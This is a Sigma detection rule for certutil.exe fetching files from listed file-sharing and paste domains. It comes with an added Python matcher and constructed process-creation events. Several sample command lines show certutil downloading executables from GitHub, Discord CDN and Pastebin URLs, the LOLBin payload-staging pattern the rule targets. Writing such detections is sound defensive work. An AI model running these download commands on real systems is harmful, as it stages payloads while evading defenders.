Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE

Detects certutil.exe (matched by image path or by its OriginalFileName, so a renamed copy is still caught) invoked with a switch that makes it fetch a remote file (urlcache, verifyctl, or the GUI URL mode) while the command line references a known file-sharing, paste, or free-hosting domain such as GitHub, the Discord CDN, Pastebin, or transfer.sh. This is the LOLBin download pattern (T1105) used to stage payloads; downloads from direct IPs or from hosts not in the list are covered by the related direct-IP and generic download rules.

Sigma rule

title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE
id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794
related:
    - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download
      type: similar
    - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 # Generic download
      type: similar
    - id: 8b48ad89-10d8-4382-a546-50588c410f0d
      type: similar
    - id: d635249d-86b5-4dad-a8c7-d7272b788586
      type: similar
    - id: 52182dfb-afb7-41db-b4bc-5336cb29b464
      type: similar
    - id: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99
      type: similar
    - id: e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97
      type: similar
    - id: 7b434893-c57d-4f41-908d-6a17bf1ae98f
      type: similar
    - id: 8518ed3d-f7c9-4601-a26c-f361a4256a0c
      type: similar
    - id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb
      type: similar
    - id: b6e04788-29e1-4557-bb14-77f761848ab8
      type: similar
    - id: a0d7e4d2-bede-4141-8896-bc6e237e977c
      type: similar
    - id: 297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7
      type: similar
status: test
description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
    - https://forensicitguy.github.io/agenttesla-vba-certutil-download/
    - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/
    - https://twitter.com/egre55/status/1087685529016193025
    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
    - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
    - https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-15
modified: 2026-03-29
tags:
    - attack.stealth
    - attack.t1027
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\certutil.exe'
        - OriginalFileName: 'CertUtil.exe'
    selection_flags:
        CommandLine|contains:
            - 'urlcache '
            - 'verifyctl '
            - 'URL '
    selection_http:
        CommandLine|contains:
            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)
            - '0x0.st'
            - 'anonfiles.com'
            - 'bashupload.com'
            - 'cdn.discordapp.com'
            - 'chunk.io'
            - 'ddns.net'
            - 'dl.dropboxusercontent.com'
            - 'ghostbin.co'
            - 'github.com'
            - 'glitch.me'
            - 'gofile.io'
            - 'hastebin.com'
            - 'mediafire.com'
            - 'mega.nz'
            - 'onrender.com'
            - 'pages.dev'
            - 'paste.ee'
            - 'pastebin.com'
            - 'pastebin.pl'
            - 'pastetext.net'
            - 'privatlab.com'
            - 'privatlab.net'
            - 'send.exploit.in'
            - 'sendspace.com'
            - 'storage.googleapis.com'
            - 'storjshare.io'
            - 'supabase.co'
            - 'temp.sh'
            - 'transfer.sh'
            - 'trycloudflare.com'
            - 'ufile.io'
            - 'w3spaces.com'
            - 'workers.dev'
            - 'x0.at'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml
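To make the detection logic concrete, the following is an added Python example that is not part of the Sigma project, this rule, or its regression data: it re-implements the three selections and the `all of selection_*` condition as plain functions and runs them over a handful of constructed process-creation events (not real telemetry). It assumes Sigma's default semantics: string matching, `contains` and `endswith` are case-insensitive, a list of values is OR, a list of maps under one selection is OR, and the condition ANDs the selections. Field names follow the Sigma Windows process_creation log source (Image, OriginalFileName, CommandLine).

```python
"""Added example (not the Sigma project's code): a minimal matcher mirroring
the rule's selections, run over constructed process_creation events.

Assumed Sigma semantics: case-insensitive string matching; a list of values
is OR; a list of maps under a selection is OR; the condition ANDs selections.
"""

# Values copied from the rule body; the matcher lowercases both sides.
IMAGE_SUFFIXES = ("\\certutil.exe",)
ORIGINAL_FILENAMES = ("certutil.exe",)
DOWNLOAD_FLAGS = ("urlcache ", "verifyctl ", "url ")
FILE_SHARING_DOMAINS = (
    ".githubusercontent.com", "0x0.st", "anonfiles.com", "bashupload.com",
    "cdn.discordapp.com", "chunk.io", "ddns.net", "dl.dropboxusercontent.com",
    "ghostbin.co", "github.com", "glitch.me", "gofile.io", "hastebin.com",
    "mediafire.com", "mega.nz", "onrender.com", "pages.dev", "paste.ee",
    "pastebin.com", "pastebin.pl", "pastetext.net", "privatlab.com",
    "privatlab.net", "send.exploit.in", "sendspace.com",
    "storage.googleapis.com", "storjshare.io", "supabase.co", "temp.sh",
    "transfer.sh", "trycloudflare.com", "ufile.io", "w3spaces.com",
    "workers.dev", "x0.at",
)


def _field(event, name):
    """Return a field lowercased; a missing field compares as empty (no match)."""
    return str(event.get(name, "")).lower()


def selection_img(event):
    """Image|endswith '\\certutil.exe' OR OriginalFileName 'CertUtil.exe'.
    The OriginalFileName branch (PE version info) catches a renamed binary."""
    return any(_field(event, "Image").endswith(s) for s in IMAGE_SUFFIXES) or \
        _field(event, "OriginalFileName") in ORIGINAL_FILENAMES


def selection_flags(event):
    """CommandLine|contains a switch that makes certutil fetch a URL.
    Each value carries a trailing space: the switch must be followed by an
    argument, so 'urlcache' as a bare last token does not count."""
    cmd = _field(event, "CommandLine")
    return any(f in cmd for f in DOWNLOAD_FLAGS)


def selection_http(event):
    """CommandLine|contains one of the listed file-sharing / paste / hosting domains."""
    cmd = _field(event, "CommandLine")
    return any(d in cmd for d in FILE_SHARING_DOMAINS)


def matches(event):
    """condition: all of selection_*"""
    return selection_img(event) and selection_flags(event) and selection_http(event)


# Constructed sample events (not real telemetry).
EVENTS = [
    {   # 0: payload fetched from a GitHub raw URL -> hit
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil.exe -urlcache -split -f https://raw.githubusercontent.com/example/repo/main/p.exe C:\Users\Public\p.exe",
    },
    {   # 1: renamed copy of certutil; only OriginalFileName still identifies it -> hit
        "Image": r"C:\Users\Public\cu.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"cu.exe -verifyctl -f -split https://cdn.discordapp.com/attachments/1/2/x.bin",
    },
    {   # 2: the GUI '-URL' form; case-insensitive 'url ' matches '-URL ' -> hit
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil.exe -URL https://pastebin.com/raw/abcd1234",
    },
    {   # 3: download switch, but an internal host not in the list -> no hit
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil.exe -urlcache -split -f http://pki.corp.example/ca.crt C:\Temp\ca.crt",
    },
    {   # 4: a listed domain appears in a local path, but no download switch -> no hit
        "Image": r"C:\Windows\System32\certutil.exe",
        "OriginalFileName": "CertUtil.exe",
        "CommandLine": r"certutil.exe -hashfile C:\Users\a\Downloads\github.com-release.zip SHA256",
    },
    {   # 5: a different tool entirely -> no hit
        "Image": r"C:\Program Files\Git\cmd\git.exe",
        "OriginalFileName": "git.exe",
        "CommandLine": r"git clone https://github.com/example/repo",
    },
]


def alerts(events=EVENTS):
    """Return the indexes of the events the rule would fire on."""
    return [i for i, ev in enumerate(events) if matches(ev)]


if __name__ == "__main__":
    print("alerts on events:", alerts())  # [0, 1, 2]
```

Events 3 and 4 are the two checks a practitioner should keep in mind when tuning: the rule deliberately fires only when a download switch and a listed domain appear together, so an internal PKI fetch or a hash computation over a file whose name happens to contain `github.com` stays quiet; hosts outside the list are the job of the related generic and direct-IP download rules. Event 1 shows why `OriginalFileName` sits alongside the image path: a copied and renamed certutil still carries its PE version resource. A real Sigma backend also has to handle field-name mapping and the `|contains` escaping rules of the target SIEM, which this matcher does not attempt.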
